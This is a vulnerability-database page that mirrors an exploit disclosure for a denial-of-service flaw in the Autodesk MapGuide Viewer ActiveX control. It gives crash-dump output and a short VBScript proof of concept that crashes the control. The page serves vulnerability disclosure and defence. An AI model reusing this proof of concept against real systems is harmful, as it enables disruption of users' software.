Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Autodesk MapGuide Viewer ActiveX Denial of Service

🗓️ 01 Sep 2010 00:00:00Reported by d3b4gType 
zdt
 zdt🔗 0day.today👁 40 Views

Autodesk MapGuide Viewer ActiveX Denial of Service vulnerability in MGAXCTRL.DLL with 6.5 version on Winxp SP

Code
==================================================
Autodesk MapGuide Viewer ActiveX Denial of Service
==================================================

# Exploit Title: Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability
# Date: [01-09-2010]
# Author: [d3b4g]
# Software Link: http://usa.autodesk.com/adsk/servlet/item?siteID=123112&id=9454821
# Version: [6.5]
# Tested on: [Winxp SP3]
# regards to ROL guys
 
Exception Code: ACCESS_VIOLATION
Disasm: 175CE9E CMP DWORD PTR [ESI+1C],0    (MGAXCTRL.DLL)
 
Seh Chain:
--------------------------------------------------
1   192847C     MGAXCTRL.DLL
2   73352542    VBSCRIPT.dll
3   7C839AD8    KERNEL32.dll
 
 
 
Registers:
--------------------------------------------------
EIP 0175CE9E
EAX 00000001
EBX 003EB690 -> 0193F684
ECX 00000000
EDX 003E0608 -> 00180F98
EDI 003EB5D8 -> 0193FC24
ESI 00000404
EBP 0013EA84 -> 0013EAA0
ESP 0013EA58 -> 003EB644
 
ArgDump:
--------------------------------------------------
EBP+8   003EB644 -> 0193F90C
EBP+12  00000000
EBP+16  0013EAD4 -> 00130000
EBP+20  0042C4F4 -> 00110024
EBP+24  0013EA94 -> 0013EAD4
EBP+28  0013EB30 -> 0013EBC0
 
 
Block Disassembly:
--------------------------------------------------
175CE8F POP ESI
175CE90 JMP [EAX+60]
175CE93 PUSH ESI
175CE94 LEA ESI,[ECX+404]
175CE9A TEST ESI,ESI
175CE9C JE SHORT 0175CEC2
175CE9E CMP DWORD PTR [ESI+1C],0      <--- CRASH
175CEA2 JE SHORT 0175CEC2
175CEA4 PUSH 0
175CEA6 PUSH DWORD PTR [ESP+C]
175CEAA MOV ECX,ESI
175CEAC PUSH 0
175CEAE CALL 01912C63
175CEB3 MOV EAX,[ESI]
175CEB5 MOV ECX,ESI
 
PoC:
 
 
<object classid='clsid:62789780-B744-11D0-986B-00609731A21D' id='target' />
<script language='vbscript'>
 
'File Generated by COMRaider v0.0.133 - http://labs.idefense.com
 
'Wscript.echo typename(target)
 
'for debugging/custom prolog
targetFile = "C:\Program Files\Autodesk\MapGuideViewerActiveX6.5\MgAxCtrl.dll"
prototype  = "Property Let LayersViewWidth As Long"
memberName = "LayersViewWidth"
progid     = "MGMapControl.MGMap"
argCount   = 1
 
arg1=0
 
target.LayersViewWidth = arg1
 
</script>



#  0day.today [2018-01-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Sep 2010 00:00Current
7High risk
Vulners AI Score7
autodesk mapguide viewerdenial of servicemgaxctrl.dll6.5winxp sp3
40